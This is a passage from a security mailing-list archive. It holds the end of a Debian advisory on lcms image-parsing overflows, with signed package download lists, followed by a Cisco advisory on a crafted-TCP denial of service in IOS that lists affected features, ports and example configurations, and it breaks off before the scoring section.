Chris Evans discovered that lcms is affected by a memory leak, which
could result in a denial of service via specially crafted image files.
CVE-2009-0723
Chris Evans discovered that lcms is prone to several integer overflows
via specially crafted image files, which could lead to the execution of
arbitrary code.
CVE-2009-0733
Chris Evans discovered the lack of upper-gounds check on sizes leading
to a buffer overflow, which could be used to execute arbitrary code.
For the stable distribution (lenny), these problems have been fixed in
version 1.17.dfsg-1+lenny2.
For the oldstable distribution (etch), these problems have been fixed
in version 1.15-1.1+etch3.
For the testing distribution (squeeze) and the unstable distribution
(sid), these problems will be fixed soon.
We recommend that you upgrade your lcms packages.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 4.0 alias etch
- -------------------------------
Debian (oldstable)
- ------------------
Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/l/lcms/lcms_1.15-1.1+etch3.diff.gz
Size/MD5 checksum: 5160 16d7404b4dc2f31cfe8c83336013cddd
http://security.debian.org/pool/updates/main/l/lcms/lcms_1.15-1.1+etch3.dsc
Size/MD5 checksum: 644 5fe77039701cfa261d3ef84842d0e81e
http://security.debian.org/pool/updates/main/l/lcms/lcms_1.15.orig.tar.gz
Size/MD5 checksum: 791543 95a710dc757504f6b02677c1fab68e73
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.15-1.1+etch3_alpha.deb
Size/MD5 checksum: 181316 b06ba5e4b64f5199ef241bd9fe8f293c
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.15-1.1+etch3_alpha.deb
Size/MD5 checksum: 60246 89c087c9dd7e2d5dd2d78cbfb80c4017
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.15-1.1+etch3_alpha.deb
Size/MD5 checksum: 154378 9ab10ab4eae2ad103b2a7abc18e6cfc4
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.15-1.1+etch3_amd64.deb
Size/MD5 checksum: 149534 1c06e35f87a683ad05c0fb1503859b4b
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.15-1.1+etch3_amd64.deb
Size/MD5 checksum: 141016 f957d77d929d2e5ab9a4749cafab3b65
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.15-1.1+etch3_amd64.deb
Size/MD5 checksum: 53242 52fe759a62f8b111a65550f074c5037b
arm architecture (ARM)
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.15-1.1+etch3_arm.deb
Size/MD5 checksum: 136610 d7c849cdf0eef3e2c0c1318a31f9e7c1
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.15-1.1+etch3_arm.deb
Size/MD5 checksum: 135176 501beeb4b4309ae863c8c0d46fde6b1a
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.15-1.1+etch3_arm.deb
Size/MD5 checksum: 51742 bc7e60d9b5ac44efdf24a0b384f0f173
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.15-1.1+etch3_hppa.deb
Size/MD5 checksum: 169464 312f7f7f841c09396a6c30ca76a35754
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.15-1.1+etch3_hppa.deb
Size/MD5 checksum: 158496 9d0fa35be0159f82709447b53df2a003
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.15-1.1+etch3_hppa.deb
Size/MD5 checksum: 59260 88e7279014e0482a797d54140e74e828
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.15-1.1+etch3_i386.deb
Size/MD5 checksum: 50258 fa63f21e62c9fc8b863b60a3b470a840
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.15-1.1+etch3_i386.deb
Size/MD5 checksum: 144134 58a63611f27e80b39537c28171211699
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.15-1.1+etch3_i386.deb
Size/MD5 checksum: 138128 4c01410bae1d6508a77708206032871d
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.15-1.1+etch3_ia64.deb
Size/MD5 checksum: 78588 17da81143523be8e6ea70be3c4044422
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.15-1.1+etch3_ia64.deb
Size/MD5 checksum: 196180 68a05087486894adae92031ed3c7d510
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.15-1.1+etch3_ia64.deb
Size/MD5 checksum: 205450 66244f6ebdf34dd656cf7bbbe649e110
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.15-1.1+etch3_mips.deb
Size/MD5 checksum: 149686 8d5cb21c8f47d5576aa8d7aa5bfc6aa8
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.15-1.1+etch3_mips.deb
Size/MD5 checksum: 173982 7101d5218722dc09f7c89e09b93bd9be
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.15-1.1+etch3_mips.deb
Size/MD5 checksum: 52094 72ec336e06cf4042648d9ddd00509f35
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.15-1.1+etch3_mipsel.deb
Size/MD5 checksum: 150926 c6a286b60bc31d2f48f3fb05209f0c83
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.15-1.1+etch3_mipsel.deb
Size/MD5 checksum: 52290 91070dc723d6e000a7b78cb3221ef280
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.15-1.1+etch3_mipsel.deb
Size/MD5 checksum: 175070 6f59ce0571035853680e96134062857d
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.15-1.1+etch3_powerpc.deb
Size/MD5 checksum: 148372 30e1c544cbe11d7b207a361d0f8fadc7
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.15-1.1+etch3_powerpc.deb
Size/MD5 checksum: 148342 68e7d1bd20e8a05ea8edc165e746a784
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.15-1.1+etch3_powerpc.deb
Size/MD5 checksum: 57778 ac6467e6d888c9e64aed8612f0ec0f16
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.15-1.1+etch3_s390.deb
Size/MD5 checksum: 54298 37e6c4d12f4f33b9b0e95119a27e9714
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.15-1.1+etch3_s390.deb
Size/MD5 checksum: 143172 a95270d1b8a7c1f282fabdf349bea783
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.15-1.1+etch3_s390.deb
Size/MD5 checksum: 145324 619d5b581922e40d17de03b31db02faf
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.15-1.1+etch3_sparc.deb
Size/MD5 checksum: 51562 bf67e60a217cf1157fcd0a29a8ac1907
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.15-1.1+etch3_sparc.deb
Size/MD5 checksum: 147482 cfef0937ca2d432f04bacbd1e7f8472a
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.15-1.1+etch3_sparc.deb
Size/MD5 checksum: 138088 e40a9fb196fd26caec11619fbaf60cda
Debian GNU/Linux 5.0 alias lenny
- --------------------------------
Debian (stable)
- ---------------
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/l/lcms/lcms_1.17.dfsg-1+lenny2.dsc
Size/MD5 checksum: 1299 196c0beecdeffca26d4fd76bfa1f13fa
http://security.debian.org/pool/updates/main/l/lcms/lcms_1.17.dfsg.orig.tar.gz
Size/MD5 checksum: 883148 efe7467bac4f10d9b354d5733489334d
http://security.debian.org/pool/updates/main/l/lcms/lcms_1.17.dfsg-1+lenny2.diff.gz
Size/MD5 checksum: 11880 df69500e72128def5994ef29c66a213a
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/l/lcms/python-liblcms_1.17.dfsg-1+lenny2_alpha.deb
Size/MD5 checksum: 153634 0e6eec2a3310e2e1f700b2a05fd9130d
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.17.dfsg-1+lenny2_alpha.deb
Size/MD5 checksum: 66082 d78ea1ba9b77d499abfcd32762a1cb4d
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.17.dfsg-1+lenny2_alpha.deb
Size/MD5 checksum: 227824 daa5711586870a1c9ed8d3e522e13a5f
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.17.dfsg-1+lenny2_alpha.deb
Size/MD5 checksum: 117318 d9a92db2a1208ce29f0907156c0f21ec
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.17.dfsg-1+lenny2_amd64.deb
Size/MD5 checksum: 109436 ca441d44b110249b98976d93ee948968
http://security.debian.org/pool/updates/main/l/lcms/python-liblcms_1.17.dfsg-1+lenny2_amd64.deb
Size/MD5 checksum: 156844 eeaac6c774c317469343296904f2d8f2
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.17.dfsg-1+lenny2_amd64.deb
Size/MD5 checksum: 198650 cba03a4c26fbf1d306d669301375d741
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.17.dfsg-1+lenny2_amd64.deb
Size/MD5 checksum: 59352 5d8f067f54a1a1d1236100ec3198e07b
arm architecture (ARM)
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.17.dfsg-1+lenny2_arm.deb
Size/MD5 checksum: 187620 69df7534d2350b0d746a4c54c822a272
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.17.dfsg-1+lenny2_arm.deb
Size/MD5 checksum: 100818 03391efaf6b0e8a2a557fa18fb593a96
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.17.dfsg-1+lenny2_arm.deb
Size/MD5 checksum: 56184 d40c2a788175ea465fddf9695ae0c74e
http://security.debian.org/pool/updates/main/l/lcms/python-liblcms_1.17.dfsg-1+lenny2_arm.deb
Size/MD5 checksum: 135840 b184dfae5d2bc6f63118183b70746792
armel architecture (ARM EABI)
http://security.debian.org/pool/updates/main/l/lcms/python-liblcms_1.17.dfsg-1+lenny2_armel.deb
Size/MD5 checksum: 136226 0bbf79f1a6a8be0ff7543c3cd4e42140
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.17.dfsg-1+lenny2_armel.deb
Size/MD5 checksum: 108536 e28f48cfbca91daa41344b019cf7d5c0
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.17.dfsg-1+lenny2_armel.deb
Size/MD5 checksum: 195116 6460336eb5a0445b0c03d9696fb5fcbc
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.17.dfsg-1+lenny2_armel.deb
Size/MD5 checksum: 60304 e851d20fb24e31bde2831f74c1fd73d8
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.17.dfsg-1+lenny2_hppa.deb
Size/MD5 checksum: 217310 640dccdf2c7840500c4d4df9f53d1764
http://security.debian.org/pool/updates/main/l/lcms/python-liblcms_1.17.dfsg-1+lenny2_hppa.deb
Size/MD5 checksum: 181886 dff1392a724aec6efe449767176dfd48
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.17.dfsg-1+lenny2_hppa.deb
Size/MD5 checksum: 63650 6108c4ddbb4d2b168fb9579e263d89ec
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.17.dfsg-1+lenny2_hppa.deb
Size/MD5 checksum: 120824 fa7b2afd7746de92c8dbbf777a63be00
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/l/lcms/python-liblcms_1.17.dfsg-1+lenny2_i386.deb
Size/MD5 checksum: 149512 a52ab7fa8e0e8b7876770443f7b33d26
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.17.dfsg-1+lenny2_i386.deb
Size/MD5 checksum: 191776 67f020fc2fee74112c13c67b62bd33ac
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.17.dfsg-1+lenny2_i386.deb
Size/MD5 checksum: 55334 d67ca2db867df6f180f370ea71352ba9
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.17.dfsg-1+lenny2_i386.deb
Size/MD5 checksum: 102528 fce72bbf31189287d737104df10fb860
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.17.dfsg-1+lenny2_ia64.deb
Size/MD5 checksum: 85106 bdb601f8e0628a183552ca9662395003
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.17.dfsg-1+lenny2_ia64.deb
Size/MD5 checksum: 261388 1f4587b160e1417f7862062607aa9428
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.17.dfsg-1+lenny2_ia64.deb
Size/MD5 checksum: 168410 32803bd752ab02745c1f5421d77e76e4
http://security.debian.org/pool/updates/main/l/lcms/python-liblcms_1.17.dfsg-1+lenny2_ia64.deb
Size/MD5 checksum: 184744 c1fc1cfab42a15f14069c7b4291b58d5
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.17.dfsg-1+lenny2_mips.deb
Size/MD5 checksum: 113914 720820898fadfe0f5c9577b94d7d596d
http://security.debian.org/pool/updates/main/l/lcms/python-liblcms_1.17.dfsg-1+lenny2_mips.deb
Size/MD5 checksum: 133806 7c5158967ab58f8361c728470a8cf3ca
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.17.dfsg-1+lenny2_mips.deb
Size/MD5 checksum: 57094 0c5f8a8e4b11636ee422e67a400d276a
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.17.dfsg-1+lenny2_mips.deb
Size/MD5 checksum: 221442 cf73eb40bf7fca081eb72164cbad007b
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.17.dfsg-1+lenny2_mipsel.deb
Size/MD5 checksum: 116858 5cc0672b4e6631a065822c4dbef8f6dd
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.17.dfsg-1+lenny2_mipsel.deb
Size/MD5 checksum: 57180 e788b1715e993fd87bd450c05c8a4edb
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.17.dfsg-1+lenny2_mipsel.deb
Size/MD5 checksum: 224906 9af1ae4fd0719c03af6bcd20c06fe8b1
http://security.debian.org/pool/updates/main/l/lcms/python-liblcms_1.17.dfsg-1+lenny2_mipsel.deb
Size/MD5 checksum: 130228 d0ab9d0595147cc05012d6d85c649c16
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.17.dfsg-1+lenny2_powerpc.deb
Size/MD5 checksum: 197118 e968b8dc68cade76a972984ee7be6a42
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.17.dfsg-1+lenny2_powerpc.deb
Size/MD5 checksum: 115862 6c63f6f6e720988973299bb7aaf16be1
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.17.dfsg-1+lenny2_powerpc.deb
Size/MD5 checksum: 70946 87bf7ecd279df9b7a4378ad2aa0568b9
http://security.debian.org/pool/updates/main/l/lcms/python-liblcms_1.17.dfsg-1+lenny2_powerpc.deb
Size/MD5 checksum: 163524 888ccce8725b23b03e19ff03cd7c1dba
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.17.dfsg-1+lenny2_s390.deb
Size/MD5 checksum: 61034 91931f080c60c2bed98b07c93a1d815c
http://security.debian.org/pool/updates/main/l/lcms/python-liblcms_1.17.dfsg-1+lenny2_s390.deb
Size/MD5 checksum: 137822 57fe47c765d8dd2bd68282180786a22a
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.17.dfsg-1+lenny2_s390.deb
Size/MD5 checksum: 109236 12d604eb4030d11e5396cab3ad2be461
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.17.dfsg-1+lenny2_s390.deb
Size/MD5 checksum: 191326 ab66b338cb32e84f441c45d07e44c744
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/l/lcms/liblcms-utils_1.17.dfsg-1+lenny2_sparc.deb
Size/MD5 checksum: 58624 973b4ab50eaf18dbb55648a3b49e982c
http://security.debian.org/pool/updates/main/l/lcms/python-liblcms_1.17.dfsg-1+lenny2_sparc.deb
Size/MD5 checksum: 156994 d5a82f96ef78ee2739e35548c1d89953
http://security.debian.org/pool/updates/main/l/lcms/liblcms1_1.17.dfsg-1+lenny2_sparc.deb
Size/MD5 checksum: 102080 5aa8adf1027ae2a771f538b0630bcc77
http://security.debian.org/pool/updates/main/l/lcms/liblcms1-dev_1.17.dfsg-1+lenny2_sparc.deb
Size/MD5 checksum: 195704 5040b60f738977f0686ab32e1b705bcc
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb
http://security.debian.org/ stable/updates main
For dpkg-ftp:
ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and
http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEARECAAYFAknKFP4ACgkQ62zWxYk/rQdg0gCeNPzrr/e/sg+UdyIwtEPTanhl
sS0Ani3D50rMKSZXBNaZIg5GygAk8Lio
�JP
-----END PGP SIGNATURE-----
From - Wed Mar 25 13:02:50 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006ca7
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39838-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 7705FEC141
for <lists@securityspace.com>; Wed, 25 Mar 2009 13:02:07 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 920482373C0; Wed, 25 Mar 2009 09:34:00 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 646 invoked from network); 25 Mar 2009 16:09:22 -0000
X-TACSUNS: Virus Scanned
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco IOS Software Multiple Features Crafted TCP Sequence Vulnerability
Date: Wed, 25 Mar 2009 17:00:00 +0100
Message-id: <200903251705.tcp@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
MIME-Version: 1.0
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report:
Content-Return: Prohibited
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco IOS Software Multiple Features Crafted
TCP Sequence Vulnerability
Advisory ID: cisco-sa-20090325-tcp
http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml
Revision 1.0
For Public Release 2009 March 25 1600 UTC (GMT)
- ---------------------------------------------------------------------
Summary
======
Cisco IOS Software contains a vulnerability in multiple features
that could allow an attacker to cause a denial of service (DoS)
condition on the affected device. A sequence of specially crafted TCP
packets can cause the vulnerable device to reload.
Cisco has released free software updates that address this
vulnerability.
Several mitigation strategies are outlined in the workarounds section
of this advisory.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml
Note: The March 25, 2009, Cisco IOS Security Advisory bundled
publication includes eight Security Advisories. All of the advisories
address vulnerabilities in Cisco IOS Software. Each advisory lists
the releases that correct the vulnerability or vulnerabilities in the
advisory. The following table lists releases that correct all Cisco
IOS Software vulnerabilities that have been published in Cisco
Security Advisories on March 25, 2009, or earlier.
http://www.cisco.com/warp/public/707/cisco-sa-20090325-bundle.shtml
Individual publication links are listed below:
* Cisco IOS cTCP Denial of Service Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml
* Cisco IOS Software Multiple Features IP Sockets Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-ip.shtml
* Cisco IOS Software Mobile IP and Mobile IPv6 Vulnerabilities
http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml
* Cisco IOS Software Secure Copy Privilege Escalation Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml
* Cisco IOS Software Session Initiation Protocol Denial of Service
Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-sip.shtml
* Cisco IOS Software Multiple Features Crafted TCP Sequence
Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml
* Cisco IOS Software Multiple Features Crafted UDP Packet
Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-udp.shtml
* Cisco IOS Software WebVPN and SSLVPN Vulnerabilities
http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml
Affected Products
================
Vulnerable Products
+------------------
Devices running affected versions of Cisco IOS Software and Cisco IOS
XE Software are affected when configured to use any of the following
features within Cisco IOS:
* Airline Product Set (ALPS)
* Serial Tunnel Code (STUN) and Block Serial Tunnel Code (BSTUN)
* Native Client Interface Architecture support (NCIA)
* Data-link switching (DLSw)
* Remote Source-Route Bridging (RSRB)
* Point to Point Tunneling Protocol (PPTP)
* X.25 for Record Boundary Preservation (RBP)
* X.25 over TCP (XOT)
* X.25 Routing
Information on how to determine whether an affected feature is
enabled on a device are provided in the Details section of this
advisory.
To determine the Cisco IOS Software release that is running on a
Cisco product, administrators can log in to the device and issue the
"show version" command to display the system banner. The system
banner confirms that the device is running Cisco IOS Software by
displaying text similar to "Cisco Internetwork Operating System
Software" or "Cisco IOS Software." The image name displays in
parentheses, followed by "Version" and the Cisco IOS Software release
name. Other Cisco devices do not have the "show version" command or
may provide different output.
The following example identifies a Cisco product that is running
Cisco IOS Software Release 12.3(26) with an installed image name of
C2500-IS-L:
Router#show version
Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)
Technical Support:
http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by cisco Systems, Inc.
Compiled Mon 17-Mar-08 14:39 by dchih
<output truncated>
The following example shows a product that is running Cisco IOS
Software Release 12.4(20)T with an image name of
C1841-ADVENTERPRISEK9-M:
Router#show version
Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(20)T, RELEASE SOFTWARE (fc3)
Technical Support:
http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by Cisco Systems, Inc.
Compiled Thu 10-Jul-08 20:25 by prod_rel_team
<output truncated>
Additional information about Cisco IOS Software release naming
conventions is available in "White Paper: Cisco IOS Reference Guide"
at the following link:
http://www.cisco.com/warp/public/620/1.html .
Products Confirmed Not Vulnerable
+--------------------------------
The following product and feature have been confirmed not vulnerable:
* Cisco IOS XR Software
* BGP is not affected
No other Cisco products or features configured within Cisco IOS
Software are currently known to be affected by this vulnerability.
Details
======
Completion of the 3-way handshake to the associated TCP port number
(s) of any of the features outlined below is required in order for
the vulnerability to be successfully exploited.
Airline Product Set (ALPS)
+-------------------------
Devices configured for ALPS are vulnerable. The default TCP listening
ports for ALPS are 350 and 10000. The following example shows a
vulnerable ALPS configuration:
alps local-peer <ip address>
Further information about ALPS is available in "Cisco IOS Bridging
and IBM Networking Configuration Guide, Release 12.2 - Configuring
the Airline Product Set" at the following link
http://www.cisco.com/en/US/docs/ios/12_2/ibm/configuration/guide/bcfalps_ps1835_TSD_Products_Configuration_Guide_Chapter.html
Serial Tunnel Code (STUN) and Block Serial Tunneling (BSTUN)
+-----------------------------------------------------------
Devices configured for either STUN or BSTUN are vulnerable. The
default listening TCP ports for STUN are 1990,1991 1992 and 1994. The
default listening TCP ports for BSTUN are 1963, 1976, 1977, 1978 and
1979 The following example shows a vulnerable STUN configuration:
interface serial 0/0/0
encapsulation stun
The following example shows a vulnerable BSTUN configuration:
interface serial 0/0/0
encapsulation bstun
Further information about STUN and BSTUN is available in "Cisco IOS
Bridging and IBM Networking Configuration Guide, Release 12.2 -
Configuring Serial Tunnel and Block Serial Tunnel" at the following
link
http://www.cisco.com/en/US/docs/ios/12_2/ibm/configuration/guide/bcfstun_ps1835_TSD_Products_Configuration_Guide_Chapter.html
Native Client Interface Architecture support (NCIA)
+--------------------------------------------------
Devices configured for NCIA are vulnerable, because of the underlying
transport they will use. The default listening TCP ports will be
dependent on the protocol used with NCIA, such as RSRB or DSLw. The
following examples shows a vulnerable configuration:
ncia server 1 10.66.91.138 0000.1111.2222 2222.2222.2222 1
Further information about NCIA is available in "Cisco IOS Bridging
and IBM Networking Configuration Guide, Release 12.4 - Configuring
NCIA Client/Server" at the following link
http://www.cisco.com/en/US/docs/ios/bridging/configuration/guide/br_ncia_client_svr_ps6350_TSD_Products_Configuration_Guide_Chapter.html
Data-link switching (DLSw)
+-------------------------
Devices configured for DLSw are vulnerable. The default listening TCP
ports for DSLw are 2065, 2067, 1981, 1982 and 1983. The following
example shows a vulnerable configuration:
dlsw local-peer peer-id <ip address>
Devices configured with either FST Encapsulation or Direct
Encapsulation are still vulnerable as the affected TCP ports are
opened by the "dslw local-peer peer-id ip address" command.
Further information about DLSw is available in "Cisco IOS Bridging
and IBM Networking Configuration Guide, Release 12.4 - Configuring
Data-Link Switching Plus" at the following link
http://www.cisco.com/en/US/docs/ios/bridging/configuration/guide/br_dlsw_plus_ps6350_TSD_Products_Configuration_Guide_Chapter.html
Remote Source-Route Bridging (RSRB)
+----------------------------------
Devices configured for RSRB Using IP Encapsulation over a TCP
connection are vulnerable. The default listening TCP ports for RSRB
are 1996,1987, 1988 and 1989. The following example shows a
vulnerable configuration:
source-bridge ring-group 10
source-bridge remote-peer 10 tcp <ip address>
Devices configured with either RSRB Using Direct Encapsulation or
RSRB Using IP Encapsulation over an FST Connection are not affected.
Further information about RSRB is available in "Cisco IOS Bridging
and IBM Networking Configuration Guide, Release 12.2 - Configuring
Remote Source-Route Bridging" at the following link
http://www.cisco.com/en/US/docs/ios/12_2/ibm/configuration/guide/bcfrsrb_ps1835_TSD_Products_Configuration_Guide_Chapter.html
Point to Point Tunneling Protocol (PPTP)
+---------------------------------------
Devices configured for PPTP are vulnerable. The default listening TCP
port for PPTP is 1723. The following examples shows a vulnerable
configuration:
vpdn enable
!
vpdn-group pptp
! Default PPTP VPDN group
accept-dialin
protocol pptp
virtual-template 1
Or
vpdn enable
!
vpdn-group L2_Tunneling
! Default L2TP VPDN group
! Default PPTP VPDN group
accept-dialin
protocol any
virtual-template 1
Further information about PPTP is available in "Cisco IOS VPDN
Configuration Guide, Release 12.4 - Configuring Client-Initiated
Dial-In VPDN Tunneling" at the following link
http://www.cisco.com/en/US/docs/ios/vpdn/configuration/guide/client_init_dial-in_ps6350_TSD_Products_Configuration_Guide_Chapter.html#wp1105140
X.25 Record Boundary Preservation (RBP)
+--------------------------------------
Devices configured for RBP are vulnerable. The listening TCP port is
configured with the "local port port_number" CLI command, as shown in
the next examples. The following examples shows vulnerable
configurations. The first leverages switched virtual circuits (SVC):
interface Serial1/0
x25 map rbp 1111 local port <port_number>
The second example, leverages a permanent virtual circuit (PVC):
interface Serial1/0
x25 map pvc <pvc_number> rbp local port <port_number>
Further information about RBP is available in "Cisco IOS Wide-Area
Networking Configuration Guide, Release 12.4 - X.25 Record Boundary
Preservation for Data Communications Networks" at the following link
http://www.cisco.com/en/US/docs/ios/wan/configuration/guide/wan_x25_rbp_dcn_ps6350_TSD_Products_Configuration_Guide_Chapter.html
X.25 over TCP (XOT)
+------------------
Devices configured for XOT are vulnerable. The default listening TCP
port for XOT is 1998. The following example shows a vulnerable
configuration.
xot access-group 1
and a corresponding access-list 1.
Further information about XOT is available in "Cisco IOS Wide-Area
Networking Configuration Guide, Release 12.4 - X.25 over TCP
Profiles" at the following link
http://www.cisco.com/en/US/docs/ios/wan/configuration/guide/wan_x25otcp_pro_ps6350_TSD_Products_Configuration_Guide_Chapter.html
X25 Routing
+----------
Devices configured with X25 are vulnerable. The default listening TCP
port for X25 Routing is 1998. The following example shows a
vulnerable configuration.
x25 routing
Further information about X25 is available in "Cisco IOS Wide-Area
Networking Configuration Guide, Release 12.4 - Configuring X.25 and
LAPB" at the following link
http://www.cisco.com/en/US/docs/ios/wan/configuration/guide/wan_cfg_x25_lapb_ps6350_TSD_Products_Configuration_Guide_Chapter.html
This vulnerability is documented in the following Cisco Bug ID:
CSCsr29468 and has been assigned the Common Vulnerabilities and
Exposures (CVE) identifier CVE-2009-0629.
Vulnerability Scoring Details
============================
